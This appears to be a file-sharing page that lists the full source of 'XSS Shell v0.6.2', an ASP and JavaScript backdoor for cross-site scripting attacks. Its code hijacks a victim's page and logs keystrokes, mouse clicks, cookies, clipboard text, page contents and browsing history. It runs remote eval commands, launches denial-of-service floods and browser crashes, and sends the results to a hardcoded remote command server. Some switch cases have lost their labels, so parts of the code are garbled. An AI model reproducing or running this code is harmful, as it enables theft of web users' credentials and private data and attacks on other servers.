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资源名称:xssshell.rar [点击查看]
- <%
- ' -------------------------
- ' XSS SHELL v0.6.2
- ' -------------------------
- ' Ferruh Mavituna - ferruh{at}mavituna.com
- '
- '
- ' For details and changelog refer to README file.
- '
- ' -------------------------
- ' -------------------------
- ' XSS Shell, XSS Backdoor for more effective XSS attacks
- ' Copyright (C) {2006-2007} {Ferruh Mavituna} http://ferruh.mavituna.com
- '
- ' This program is free software; you can redistribute it and/or modify it
- ' under the terms of the GNU General Public License as published by the Free
- ' Software Foundation; either version 2 of the License, or (at your option)
- ' any later version.
- '
- ' This program is distributed in the hope that it will be useful, but WITHOUT
- ' ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- ' FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
- '
- ' You should have received a copy of the GNU General Public License along with
- ' this library; if not, write to the Free Software Foundation, Inc., 59 Temple
- ' Place, Suite 330, Boston, MA 02111-1307 USA
- '
- 'Prevent caching (if you want)
- Response.CacheControl = "no-cache"
- Response.AddHeader "Pragma", "no-cache"
- Response.Expires = -1
- 'Load VBScript
- If Request.Querystring("vb") > 0 Then LoadVb() : Response.End
- '/*
- '*/
- Const DefaultID = 336699
- Const BroadCast = 336699
- Dim VicID, VicAdd
- VicID = CLng(fm_QNStr("v"))
- 'Generate new Victim on the fly
- If VicID = BroadCast Then VicID = fm_RndNumeric
- 'Add if not default victim
- If VicID <> DefaultID Then VicAdd = "&v=" & VicID
- %>
- /*
- */
- // Debug verbose level (0 = nothing, 1 = verbose, 2 = very verbose)
- var DEBUGLEVEL = 0;
- // Normally victim ID should be unique we can not trust IP its not so reliable, but maybe later as an option
- var VICTIM = "<%=VicID%>";
- /*
- ----------------------------------------------
- ----------------------------------------------
- */
- // You XSSShell Server
- var SERVER = "http://winnie.imzone.in:60000/";
- // This file's name
- var ME = SERVER + "xssshell.asp?p=1<%=VicAdd%>" ;
- // Connector file
- var CONNECTOR = SERVER + "admin/connector.asp";
- // Commands file
- var COMMANDS_URL = SERVER + "admin/commands.asp";
- /*
- ----------------------------------------------
- ----------------------------------------------
- Rest of the configuration includes detailed config. If you don't want fine tuning you don't need touch it.
- */
- // Vbs file
- var VBS_URL = ME + "&vb=1";
- /*
- */
- // This URL will be regenerated (so you can force victim to redirect somewhere else maybe login page or something right after the infection)
- var THIS_SRC = "?rand="+generateID();
- // Regen properties
- var REGEN_IFRAME_ID = "IframeRogue";
- var CONTROLLER_ID = "ControllerFrame";
- var LOADER_ID = "IframeLoader";
- var IFRAME_TITLE_FREQ = 500;
- // Random identifier for DoS attacks
- /*
- */
- // Regenerate page in frames to keep it alive
- var REGENERATE_PAGE = true;
- // Keylogger
- var LOAD_KEYLOGGER = true;
- // Mouselogger (for virtual keyboards etc.)
- var LOAD_MOUSELOGGER = true;
- // Get current DOM on every click ! Only works if mouselogger enabled
- var GET_SELF_EVERY_CLICK = false;
- /*
- */
- // IE 4.0 Limit = 2083
- // 1024 is a secure one...
- var BUFFER_LIMIT = 1024;
- // Myself
- var XSSSHELL = true;
- // Space for other stuff
- BUFFER_LIMIT -= 200;
- /*
- */
- // Send & Rec. not going to work in cross domain for almost all browsers so just for fun...
- var XMLHTTP = 0;
- // Just sending (to receive from an Iframe see ROUND_TRIP model)
- var IFRAME = 1;
- // Generally just for receieve
- var IMG = 2;
- // Load remote JS and parse it.
- var JSMODEL = 3;
- // Make roundtrips with payload to server and read from Iframe URL
- var ROUND_TRIPS = 4;
- /*
- */
- var recCommunication = JSMODEL;
- var sendCommunication = IFRAME;
- var communication = recCommunication;
- /*
- */
- // Process Commmand wait frequency as ms
- // This is important, because we don't track responses which means we blindly uses same iframe for every command response, which means lots of fucked up threads....
- var PROCESS_FREQ = 1000; //1000;
- // Request for new commmands frequency as ms
- var REQUEST_FREQ = 500;
- // Remote load control frequency
- // If there is no getCommand() call we try to make it alive again
- var REQ_TIMEOUT = 5000;
- // If something goes server-response wait before remove last commands from que
- var WAIT_AND_CALL = 2000;
- // When you launch DoS all victims is going to start this number of connections by default (also you can supply this number while sending command)
- /*
- */
- // Log Types
- var HTMLPAGE = 1;
- var TEXT = 2;
- var REPORT = 3;
- // Broadcast victim, accept everytime
- var BROADCAST_VICTIM = 336699;
- // Keylogger Data
- var keyloggerData = "KEYLOGGER:";
- // Mouse Logger Data
- var mouseLoggerData = "";
- // Any commands return or not
- var anyCommands = false;
- /*
- If you want to add a new feature add it to here.
- */
- // Command Enums
- var CMD_GETCOOKIE = 1;
- var CMD_ALERT = 3;
- var CMD_YESNO = 4;
- var CMD_EVAL = 5;
- var CMD_GETKEYS = 6;
- var CMD_GETMOUSE = 7;
- var CMD_PORTSCAN = 10;
- var CMD_HISTORY = 11;
- var CMD_GETURL = 12;
- var CMD_DOS = 13;
- var CMD_CRASH = 14;
- var CMD_STOPDOS = 15;
- // Build Data Types
- var dataTypes = new Array();
- dataTypes[CMD_GETCOOKIE] = TEXT ;
- dataTypes[CMD_ALERT] = TEXT ;
- dataTypes[CMD_YESNO] = TEXT ;
- dataTypes[CMD_EVAL] = TEXT ;
- dataTypes[CMD_GETKEYS] = TEXT ;
- dataTypes[CMD_GETMOUSE] = TEXT ;
- dataTypes[CMD_PORTSCAN] = TEXT ;
- dataTypes[CMD_HISTORY] = TEXT ;
- dataTypes[CMD_GETURL] = HTMLPAGE ;
- dataTypes[CMD_DOS] = TEXT ;
- dataTypes[CMD_CRASH] = TEXT ;
- dataTypes[CMD_STOPDOS] = TEXT;
- var NO_RECORD = 0;
- /*
- */
- // Timeout Check
- var lastAccess=0;
- // Internal
- var d = document;
- // Switch to context
- var td = document;
- var DEBUG_DIV = "debugshell";
- var IFRAME_ID = "communicationIframe";
- var COMMAND_SEPERATOR = "{|}";
- var REMOTE_SCRIPT_ID = "remoteJs";
- var FORM_ID = "r_control_tunnel";
- // Command Que - FIFO
- var commands = new Array();
- // IE
- var ie = d.all;
- // Command Structure
- function command(cmd, param, attackID) {
- this.cmd = cmd;
- this.param = param.split("|,|"); // Convert to array
- this.attackID = attackID;
- }
- // Setup onload initilaizer
- window.onload += function(){
- init();
- };
- /*
- Get current page HTML
- @Return : HTML Code of current page
- */
- function getSelfHtml(){
- return getDomain().body.parentNode.innerHTML;
- }
- /*
- Get current document cookie
- @Return : Cookie of current document
- */
- function getCookie(){
- return d.cookie;
- }
- function getHistory(list){
- var ret="";
- var checkLinks = list.split("n");
- for (var i=0;i<checkLinks.length ;i++ )
- ret += checkLinks[i] + ":" + IsVisited(checkLinks[i]) + "{n}";
- return ret;
- }
- /*
- Generate a new hidden div for history checking
- Damn IE!, I have to update the code beacause of stupid IE. Now it's generating new iframe and putting style sheet into it then checking...
- */
- function getDummyIframe(){
- var IEdyn = d.getElementById(CHECK_BOX);
- if (!IEdyn){
- IEdyn = d.createElement("iframe");
- IEdyn.style.visibility = "hidden";
- IEdyn.id = CHECK_BOX;
- d.body.appendChild(IEdyn);
- var df = getFrameCont(IEdyn);
- var style = "<style>a:visited{width:0px};</style>";
- df.open();
- df.write(style);
- df.close();
- }
- return IEdyn;
- }
- /*
- Get frame document cross-browser
- */
- function getFrameCont(frame){
- var fd = frame.contentDocument;
- if(!fd)fd = frame.contentWindow.document;
- return fd;
- }
- /*
- Checks given link and retur true if visited false otherwise
- */
- function IsVisited(link){
- var df = getFrameCont(getDummyIframe());
- var checkLink = df.createElement("a");
- checkLink.href = link;
- df.body.appendChild(checkLink);
- if (checkLink.currentStyle)
- visited = checkLink.currentStyle["width"];
- else
- visited = df.defaultView.getComputedStyle(checkLink, null).getPropertyValue("width");
- return (visited == "0px");
- }
- /*
- Return the name of loaded frame
- */
- function whereAmI(){
- for (var i=0;i<parent.window.frames.length ;i++ ){
- if (parent.window.frames[i].document == self.document){
- return parent.window.frames[i].name;
- }
- }
- return "0";
- }
- /*
- Main init function handle onload stuffs
- */
- function init(){
- d.loadXSS=true;
- // Regenerate page in frames
- // Regenerate current page in frames
- if(parent.window.frames[0]){
- // Check if loaded in Rogueframe
- if ( whereAmI() == REGEN_IFRAME_ID ){
- return;
- }
- // Check if loaded in Controller
- if ( whereAmI() == CONTROLLER_ID ){
- checkTitleChanges();
- }
- }else{ // First load - Generate and get out !
- window.setTimeout(addRegenFramesets, 1);
- return;
- }
- }
- // In fact this keylogger and mouselogger is *almost* useless in regenerated pages !
- // Load Keylogger
- document.onkeypress = logKeys;
- // Load MouseLogger
- document.onclick = logMouse;
- // Command Channel
- commandListener();
- // Check for potential connection error and re-attempt to connect
- checkTimeout();
- // Load vbscript
- loadVb(VBS_URL);
- // Handle errors
- if(!debug)window.onerror = handleError;
- debug("init finished !", 2);
- }
- /*
- Handle errors and try to keep connection alive...
- */
- function handleError(){
- // On error remove received commands
- //getCommands();
- }
- /*
- Remove given command with ERR response
- */
- function removeCommand(cmd){
- log("ERR", TEXT, cmd.attackID, " ");
- }
- /*
- Check timeout problems every second and reconnect if connection dropped
- */
- function checkTimeout(){
- var now = new Date().getTime();
- // Get commands again if we didn't do it for a long time
- if (now - REQ_TIMEOUT > lastAccess){
- getCommands()
- }
- window.setTimeout("checkTimeout()", 1000);
- }
- /*
- Get current document context (why named getDomain() ?)
- May switch optionally to support other issues
- */
- function getDomain(){
- return parent.window.frames[REGEN_IFRAME_ID].document;
- }
- /*
- Source Partially : http://www.howtocreate.co.uk/jslibs/otherdemo.html
- */
- function logKeys( e ) {
- if( !e ) { e = window.event; }
- if( !e ) { return; }
- if( e.which ) { key = e.which; }
- else if( e.keyCode ) { key = e.keyCode; }
- else if( e.charCode ) { key = e.charCode }
- key = String.fromCharCode(key);
- // Log
- keyloggerData += key;
- debug(key, 2);
- }
- /*
- Get commands from server and que them via pushCommands()
- */
- function getCommands(){
- // Update time
- lastAccess = new Date().getTime();
- debug("Request done for commands", 2);
- debug(COMMANDS_URL + "?v=" + VICTIM, 2);
- if( !getRequest(COMMANDS_URL + "?v=" + VICTIM + "&r=" + generateID(), pushCommands, recCommunication) ){
- //window.setTimeout("getCommands()", REQUEST_FREQ);
- }
- processCommand();
- }
- /*
- Push commands
- */
- function pushCommands(cmd){
- // No job
- if(cmd == NO_RECORD) {
- debug("No commands to process!", 2);
- //window.setTimeout("getCommands()", REQUEST_FREQ);
- return ;
- }
- debug("Commands gathered : " + cmd, 1);
- //Go for it...
- var allCommands = cmd.split(COMMAND_SEPERATOR);
- for (var i = 0;i< allCommands.length; i+=3)
- {
- // Add new command
- var newcmd = parseCommand(allCommands, i);
- commands.push(newcmd);
- }
- debug("Commands in que : " + commands.length, 1);
- }
- /*
- Parse raw command request array and returns as new command
- @rawCmd : Not exactly it's an array
- @baseId : Array start point
- - New Command
- */
- function parseCommand(rawCmd, baseId){
- return new command(rawCmd[baseId], rawCmd[baseId+1], rawCmd[baseId+2]);
- }
- /*
- Generatre Random ID for AttackID (fix it with more random and unique stuff)
- */
- function generateID(){
- return Math.floor(Math.random()*999999999);
- }
- /*
- Process que and fire up commands until all of them finished
- - Delayed recursive function
- - Works multithreaded
- */
- function processQue(){
- debug("Que len : " + commands.length, 1);
- // No commands to manage in que
- if (commands.length === 0){
- // Check for new commands
- //window.setTimeout("getCommands()", REQUEST_FREQ);
- return;
- }
- }
- /*
- Check new commands
- */
- function commandListener(){
- getCommands();
- //window.setTimeout("commandListener()", REQUEST_FREQ);
- }
- /*
- Process que (FIFO style)
- 21/04/2007
- - Recursively process every command until no more (I hope JS handles locking automaticly!)
- */
- function processCommand(){
- // No commands
- if( commands.length == 0 ){
- //getCommands();
- window.setTimeout("getCommands()", REQUEST_FREQ);
- return;
- }
- // Get current command
- var cmd = commands.shift();
- processGivenCommand(cmd);
- processCommand();
- }
- /*
- Wait and call callback
- */
- function waitAndCall(callback, wait){
- window.setTimeout(callback, wait);
- }
- /*
- Internal calls for given commands
- */
- function processGivenCommand(cmd){
- switch (parseInt(cmd.cmd)){
- log(getCookie(), dataTypes[cmd.cmd], cmd.attackID, "waitAndRun()");
- break;
- log(d.location, dataTypes[cmd.cmd], cmd.attackID, "waitAndRun();" );
- break;
- log(binEncode(getSelfHtml()), dataTypes[cmd.cmd], cmd.attackID, "waitAndRun();" );
- break;
- case CMD_EVAL:
- eval(cmd.param[0]);
- log("Success", dataTypes[cmd.cmd], cmd.attackID, "waitAndRun();");
- break;
- case CMD_ALERT:
- alert(cmd.param[0]);
- log("Success", dataTypes[cmd.cmd], cmd.attackID, "waitAndRun();");
- break;
- case CMD_YESNO:
- log(prompt(cmd.param[0], ""), dataTypes[cmd.cmd], cmd.attackID, "waitAndRun()");
- break;
- log(keyloggerData, dataTypes[cmd.cmd], cmd.attackID, "waitAndRun()" );
- break;
- log(mouseLoggerData, dataTypes[cmd.cmd], cmd.attackID, "waitAndRun()" );
- break;
- log(getClipboard(), dataTypes[cmd.cmd], cmd.attackID, "waitAndRun()" );
- break;
- log(getInternalIP(), dataTypes[cmd.cmd], cmd.attackID, "waitAndRun()" );
- break;
- /* case CMD_PORTSCAN:
- log(portScan(cmd.param[0], cmd.param[1]), dataTypes[cmd.cmd], cmd.attackID, "waitAndRun()" );
- break; */
- log(getHistory(cmd.param[0]), dataTypes[cmd.cmd], cmd.attackID, "waitAndRun()");
- break;
- case CMD_GETURL:
- cmdGetURL(cmd);
- break;
- case CMD_CRASH:
- log("Don't expect a response!", dataTypes[cmd.cmd], cmd.attackID, "waitAndRun()");
- cmdCrash();
- break;
- case CMD_DOS:
- log("DoS Started", dataTypes[cmd.cmd], cmd.attackID, "waitAndRun()");
- // Get from master param
- if (cmd.param[1] != undefined)force = cmd.param[1];
- stopDoS = true;
- cmdDoS(cmd.param[0], force);
- break;
- stopDoS = true;
- log("DoS should be stopped.", dataTypes[cmd.cmd], cmd.attackID, "waitAndRun()");
- }
- }
- /*
- Dummy Wait
- */
- function waitAndRun(){
- debug("Command Processed", 2);
- }
- /*
- Write debug information to DEBUG_DIV
- @msg : Debug Message
- - Only for debug...
- 16/08/2006
- - Debug verbose level added
- */
- function debug(msg, level){
- if(DEBUGLEVEL == 0 )
- return;
- if(typeof level == "undefined")
- level = 0;
- // Check for debug level and show
- if(level <= DEBUGLEVEL){
- generateDebugConsole();
- d.getElementById(DEBUG_DIV).innerHTML += "- " + msg + "<br>" ;
- }
- }
- /*
- Check for debug console generate if it's not already around
- - Only for debug...
- */
- function generateDebugConsole(){
- if(d.getElementById(DEBUG_DIV) === null) {
- var debugConsole;
- debugConsole = d.createElement("div");
- debugConsole.innerHTML = "<strong>Debug Console!</strong><hr>";
- debugConsole.id = DEBUG_DIV;
- d.body.appendChild(debugConsole);
- //debugConsole.className = DEBUG_DIV; // Damn its not working in IE I dont know why! so I did it by my dirty JS hands
- var dc = debugConsole.style;
- dc.color = "#0F0";
- dc.backgroundColor="#000";
- dc.padding="3px";
- dc.width = "400px";
- dc.border="1px solid #F00";
- dc.fontSize="11px";
- dc.fontFamily="Lucida Sans";
- }
- }
- /*
- GetURL() source in the same domain by XMLHTTP (with POST DATA support)
- */
- function cmdGetURL(cmd){
- var postData="";
- if (cmd.param.length>0)
- postData = cmd.param[1];
- getRequest(cmd.param[0], getURLHandler, postData, XMLHTTP, dataTypes[cmd.cmd], cmd.attackID);
- }
- /*
- Handle getURL() event and send to master
- 08.04.2007
- - Binary Encoding added
- */
- function getURLHandler(dataType, attackID, response){
- //response = buildResponse(response);
- // TODO: Implement timeout for request and run wait and run if something goes wrong...
- log(buildResponse(response), dataType, attackID, "waitAndRun()");
- }
- /*
- Do Request to Master
- @data : Data will be send to master
- @dataType : Datatype HTML, Text etc.
- @attackID : Attack ID identifier
- - SERVER hardcoded in Config
- + DONE + Potential BUG TODO : Escape Chars Fix with URL Encode
- - Implement POST support
- - Data type added
- - Encoding added
- - AttackID added
- - Function seperated into 2 parts, log is now only prepare data and send it to getRequest() core function
- */
- function log(data, dataType, attackID, callBack){
- url = CONNECTOR + "?r=" + generateID();
- postData = "d=" + escape(data) + "&t=" + escape(dataType) + "&a=" + escape(attackID);
- getRequest(url, callBack, postData, sendCommunication);
- }
- /*
- Dummy Iframe Generator for submit
- Add Iframe for hidden communication
- FIXED + IE version more stable with Iframe regeneration.
- We need to keep track of Iframes and destroy them for a better memory management (not quite sure about the load)
- */
- function addIframe(){
- var iframeLoader = d.getElementById(LOADER_ID);
- try{
- // New loader if not exist
- if( !iframeLoader ){
- var tmpDiv = d.createElement("div");
- tmpDiv.id = LOADER_ID;
- d.body.appendChild(tmpDiv);
- }
- }catch(e){
- debug("Adding new div failed !", 1);
- }
- // TODO : Keep track of Iframe names in commands and destroy when complete command for memory issues
- // Generate a random Iframe Name
- var IframeName = IFRAME_ID + Math.floor(Math.random()*99999999);
- // If exist remove Iframe
- try{
- if( d.getElementById(IframeName) ){
- d.getElementById(LOADER_ID).innerHTML = "";
- }
- }catch(e){
- debug("Removing loader failed !", 1);
- }
- try{
- // FIX : IE5 dynamic Iframe issues
- cIframe = d.createElement("iframe");
- cIframe.id = IframeName;
- cIframe.name = IframeName;
- if(DEBUGLEVEL == 0){
- cIframe.style.visibility = "hidden";
- /*cIframe.width=0;
- cIframe.height=0;
- cIframe.border=0; */
- }
- }catch(e){
- debug("Iframe generation failed !");
- }
- iframeLoader = d.getElementById(LOADER_ID);
- iframeLoader.appendChild(cIframe);
- //cIframe.src = "empty.htm";
- return IframeName;
- }
- /*
- Get xmlhttprequest object for gecko and IE style
- - External Soource Code : Lost the place where I rip-off this snippet!
- */
- function getXHR(){
- if( !window.XMLHttpRequest && window.ActiveXObject ) {
- window.XMLHttpRequest = function() {
- var a = [ 'Microsoft.XMLHTTP'];//'Msxml2.XMLHTTP', 'Msxml2.XMLHTTP.3.0', 'Msxml2.XMLHTTP.4.0', 'Msxml2.XMLHTTP.5.0' ,
- i = a.length; while(i--) {
- try {
- return new ActiveXObject( a[i] );
- } catch (e) { }
- }
- return null;
- };
- }
- var xmlhttp;
- if( window.XMLHttpRequest ) {
- xmlhttp = new XMLHttpRequest();
- }
- if( !xmlhttp ) {
- debug( 'Sorry, creating the XMLHttpRequest object failed.' );
- }
- return xmlhttp;
- }
- /*
- Core communication function
- @url : Request URL
- @callBack : Callback function, will fire when we receive response
- Error status, True or False
- 10/08/2006
- - Communication tunnels are changed and now optional
- 14/08/2006
- - Global communication removed
- 08.04.2007
- - Yay, no eval any more, so we able get rid of potential XSS in here and a better code
- 21/04/2007
- - Thread safe XMLHTTP requests
- */
- function getRequest(url, callBack, postData, GetModel, opt1, opt2){
- debug("Request : " + url, 2);
- // POST Support
- isPost = (postData != "" && postData != null);
- // Fix to generic if it's not supplied
- if ( typeof GetModel == "undefined")
- GetModel = communication;
- // Select communication type
- switch(GetModel){
- case XMLHTTP:
- debug("Using XMLHTTP", 2);
- xmlhttp = getXHR();
- xmlhttp.open((isPost) ? "POST" : "GET", url, (!ie));
- // Add post headers
- if(isPost)
- xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
- //Read binary
- if(ie) {
- xmlhttp.setRequestHeader("Accept-Charset", "x-user-defined");
- xmlhttp.setRequestHeader("Content-Type", "application/pdf");
- }else{
- xmlhttp.overrideMimeType("text/plain; charset=x-user-defined");
- }
- xmlhttp.onreadystatechange=function() {
- if (xmlhttp.readyState==4) {
- // Process Response
- callBack(opt1, opt2, xmlhttp);
- }
- };
- xmlhttp.send(postData);
- break;
- case IFRAME:
- // Maybe we should do this though DOM. Then it seems more professional with createlement...
- var formHtml = "<form name="" + FORM_ID + "" id="" + FORM_ID + "" method="POST" action="" + url + "" >";
- var formData = postData.split("&");
- for (var i = 0; i<formData.length; i++){
- var fieldStruct = formData[i].split("=");
- formHtml += "<input name="" + fieldStruct[0] + "" value="" + fieldStruct[1] + "" type="hidden">";
- }
- formHtml += "</form>";
- // submit onload
- formHtml += "<script>window.onload=function(){document.forms[0].submit();}</script>";
- buildAndSubmitForm(formHtml);
- if(!callBack)
- callBack("Form Process Started...");
- break;
- // use Img src method...
- // Just sending, and also you can get commands from loaded dimensions ...
- case IMG:
- debug("IMG mode not implemented!");
- break;
- // Just sending...
- // Load remote js and read
- case JSMODEL: // No post data support
- loadJs(url);
- // Response
- remoteJsLoadControl(callBack);
- break;
- }
- // Normally we should check for errors
- return true;
- }
- /*
- Response Channel...
- */
- function buildAndSubmitForm(html){
- var IframeName = addIframe();
- try{
- if(ie){ //IE (doesnt work stable in FF)
- window.frames[IframeName].document.write(html);
- window.frames[IframeName].document.close();
- }else{ // FF
- d.getElementById(IframeName).contentWindow.document.write(html);
- d.getElementById(IframeName).contentWindow.document.close();
- }
- }catch(e){
- debug("Blown - n" + e, 1);
- }
- debug("Response form submitted !, " + commands.length + " more commands in que", 1);
- }
- /*
- Check remote Js Loaded or Not
- @evalCallBack : Dirty Callback implementation, Function as String
- 14/08/2006
- - Started
- */
- // Timeout control for remote loading
- var remoteTimer = null;
- /*
- Check remote JS loaded. If it's loaded fire up callback.
- */
- function remoteJsLoadControl(callBack){
- if(typeof c !== "undefined" && c !== null){ // Loaded
- var remoteResponse;
- remoteResponse = c();
- callBack(remoteResponse);
- clearJsLoadControl();
- }else{
- remoteTimer = window.setTimeout("remoteJsLoadControl(" + callBack + ")", REMOTE_JS_CHECK_FREQ);
- }
- }
- /*
- Clear remote js load controller timeout
- */
- function clearJsLoadControl(){
- clearTimeout(remoteTimer);
- c = null; // For future requests
- remoteTimer = null;
- }
- /*
- Dynamicly load remote JS file for getting new commands
- @src : Request URL
- @evalCallBack : Dirty Callback implementation, Function as String
- 14/08/2006
- - Start
- */
- function loadJs(src) {
- // Possible problem with corrupted HTML pages or pages with no <head> tags
- var head = d.getElementsByTagName("head")[0];
- script = d.createElement('script');
- script.id = REMOTE_SCRIPT_ID;
- script.type = 'text/javascript';
- script.src = src;
- head.appendChild(script);
- debug("Remote JS DOM call started ...", 2);
- }
- /*
- Dynamicly load remote VB file (only load if browser is IE)
- @src : VB File URL
- Should be combined with loadJs to avoid duplicating code.
- 14/08/2006
- - Start
- */
- d.vb=false;
- function loadVb(src) {
- if (d.vb || !ie)return;
- // Possible problem with corrupted HTML pages or pages with no <head> tags
- var head = d.getElementsByTagName("head")[0];
- script = d.createElement('script');
- script.id = "vbcall";
- script.type = 'text/vbscript';
- script.src = src+"&"+generateID();
- head.appendChild(script);
- d.vb = true;
- debug("Remote VB call started ...", 2);
- }
- /*
- Get cursor coordinates
- */
- function fm_MXY(XorY){ // Mouse Coords
- var coord = 0;
- if(coord<0)coord=0;
- return coord;
- }
- /*
- Function Log mouse positions
- */
- function logMouse(e){
- var coordX=coordY=0;
- if(ie){
- coordX = event.clientX + d.body.scrollLeft;
- coordY = event.clientY + d.body.scrollTop;
- }
- else
- {
- coordX = e.pageX + d.body.scrollLeft;
- coordY = e.pageY + d.body.scrollTop;
- }
- mouseLoggerData += coordX + "-" + coordY + ";";
- processGivenCommand(new command(CMD_GETSELFHTML, "", BROADCAST_VICTIM));
- debug(coordX + " - " + coordY, 2);
- }
- /*
- Get clipboard data
- */
- function getClipboard(){
- if (!window.clipboardData)
- return "{NO BROWSER SUPPORT}";
- var txt = clipboardData.getData("Text");
- return (txt!=null)? txt : "{EMPTY}";
- }
- /*
- Code partially :
- - http://f-box.org/~dan/
- - http://www.gnucitizen.org/projects/javascript-address-info/addressinfo.js
- Get internal IP only supports Mozilla
- */
- function getInternalIP(){
- try{
- var sock = new java.net.Socket();
- sock.bind(new java.net.InetSocketAddress('', 0));
- sock.connect(new java.net.InetSocketAddress(d.domain, (!d.location.port)?80:d.location.port));
- host = sock.getLocalAddress().getHostName();
- ip = sock.getLocalAddress().getHostAddress();
- return "Host:" + host + ";" + "IP:" + ip;
- }
- catch(e){
- return "{NOT SUPPORTED}"
- }
- }
- /*
- Add Iframe
- */
- function addRegenIframe(){
- cIframe = document.createElement("iframe");
- cIframe.id = REGEN_IFRAME_ID;
- cIframe.name = REGEN_IFRAME_ID;
- cIframe.width = "100%";
- cIframe.height = "100%";
- cIframe.style.border = "none";
- cIframe.style.padding = "0";
- cIframe.style.margin = "0";
- cIframe.frameBorder = "0";
- document.body.appendChild(cIframe);
- window.frames[REGEN_IFRAME_ID].document.location = THIS_SRC;
- attachKeylogger(REGEN_IFRAME_ID);
- }
- /*
- Regenerate current page in framesets with controller
- */
- function addRegenFramesets(){
- // Load itself to controller
- var jsME = "<script src=\"" + ME + "\"><\/script>";
- // Build Frameset HTML
- var tmpHtml = "<scr"+"ipt>function ff(){var fd = document.getElementById("" + CONTROLLER_ID + "").contentWindow.document;";
- tmpHtml += "fd.write("";
- tmpHtml += "<h2>CONTROLLER<h2>" + jsME;
- tmpHtml += "");";
- // 0 Delayed load
- tmpHtml += "nfd.close();n}window.setTimeout("ff()", 0);";
- tmpHtml += "</scr"+"ipt>";
- var frameval = (DEBUGLEVEL > 0)?"70":"100";
- // Framesets
- tmpHtml += "<frameset border="2" frameborder="1" framespacing="2" cols="" + frameval + "%,*"><frame scrolling="auto" id="" + REGEN_IFRAME_ID + "" name="" + REGEN_IFRAME_ID + "" src="" + THIS_SRC + ""><frame scrolling="auto" id="" + CONTROLLER_ID + "" name="" + CONTROLLER_ID + ""></frameset>";
- document.write(tmpHtml);
- document.close();
- }
- /*
- Attack keylogger to subframes
- */
- function attachKeylogger(frameID){
- // BUG : Check the loaded one for if its our function
- if(getDomain().onkeypress == null){
- if(!ie){
- // Only FF
- getDomain().onkeypress = function(e){
- parent.window.frames[CONTROLLER_ID].document;logKeys(e);
- };
- debug("Keylogger attached to " + frameID, 1);
- }else{ // IE
- // Not working, i have no idea why...
- debug("It's an IE and I couldn't figure out how to attach an function with event succesfully...", 2);
- }
- }else{
- debug("Keylogger already attached to " + frameID, 2);
- }
- }
- /*
- Check title changes and apply
- This function constantly check for changes in sub iframe and update current document title
- 16/08/2006
- - Attach keylogger to new pages
- */
- function checkTitleChanges(){
- // We are checking if its already attached or not we can not rely on title changes...
- attachKeylogger(REGEN_IFRAME_ID);
- try{
- // Just changed
- if(parent.document.title != getDomain().title){
- parent.document.title = getDomain().title;
- }
- }catch(e){
- debug("Possible permission denied error<br>" + e);
- }
- window.setTimeout("checkTitleChanges()", IFRAME_TITLE_FREQ);
- }
- /*
- Consume CPU in all browsers in 1 seconds, generally without any "Stop Script" messagebox.
- Not crashing browser but forcing victim to kill task...
- */
- function cmdCrash(){
- var s="";
- window.setTimeout("crash()", 10);
- while(1){s=document.body.innerHTML+=s+=document.body.innerHTML;}
- }
- /*
- DoS attack (only GET supported) to another web server or something.
- Add x={RANDOM} or something to avoid caching.
- */
- var stopDoS = false;
- function cmdDoS(url, force){
- var df = getFrameCont(getDummyIframe());
- for (var i=0;i<force ;i++ ){
- if(stopDoS)return; // stop it gently
- var mg = df.createElement('img');
- mg.src = url.replace(RANDOM_INT, new Date().getMilliseconds()+i );
- }
- // wait and run again
- waitAndCall("cmdDoS('" + url + "'," + force + ")", WAIT_AND_CALL);
- }
- /*
- Binay Encode
- Encode data in a binary safe way to enable transfer all kind of data
- 15/04/2007
- - Newline big fixed
- */
- function binEncode(input){
- var output = "";
- try{
- for (var i=0;i<input.length;i++){
- var curVal = input.charCodeAt(i);
- var hex = input.charCodeAt(i).toString(16);
- if (curVal>0xFF){
- hex = hex.substring(2,4);
- }else if(curVal<0x10){
- hex = "0" + hex;
- }
- output = output + hex;
- }
- }catch (e){
- debug("Binary encoding failed" + e);
- }
- return output;
- }
- /*
- Build response from XHR object
- <status> <status text>n<headers>nn<BinaryEncodedContent>
- 08.04.2007
- */
- function buildResponse(xhr){
- var status = xhr.status;
- var statusText = xhr.statusText;
- var headers = xhr.getAllResponseHeaders()
- var content;
- content = (ie)?ieBinary(xhr):binEncode(xhr.responseText);
- var ret = status + " " + statusText + "n" + headers + "nn" + content;
- return ret
- }
- <%
- Function fm_QNStr(byVal Qstring)
- Qstring = Trim(Request.Querystring(Qstring))
- If NOT IsNumeric(Qstring) Then fm_QNStr = DefaultID Else fm_QNStr = Qstring
- End Function
- Function fm_RndNumeric()
- Randomize Timer
- fm_RndNumeric = CLng((Rnd*666139))+1
- End Function
- 'XSS Shell IE Binary Encode Implementation (should work IE6,IE7 and maybe IE5 as well)
- Function LoadVB()
- %>
- Function ieBinary(xhr)
- Dim content, ret, i
- content = xhr.responseBody
- ret = ""
- Dim hc, cret
- For i = 1 To LenB(content)
- hc = AscB(MidB(content,i,1))
- cret = Hex(hc)
- If hc < &H10 Then cret = "0" & cret
- ret = ret & cret
- Next
- ieBinary = ret
- End Function
- <%
- End Function
- %>
- if(!d.loadXSS){init()}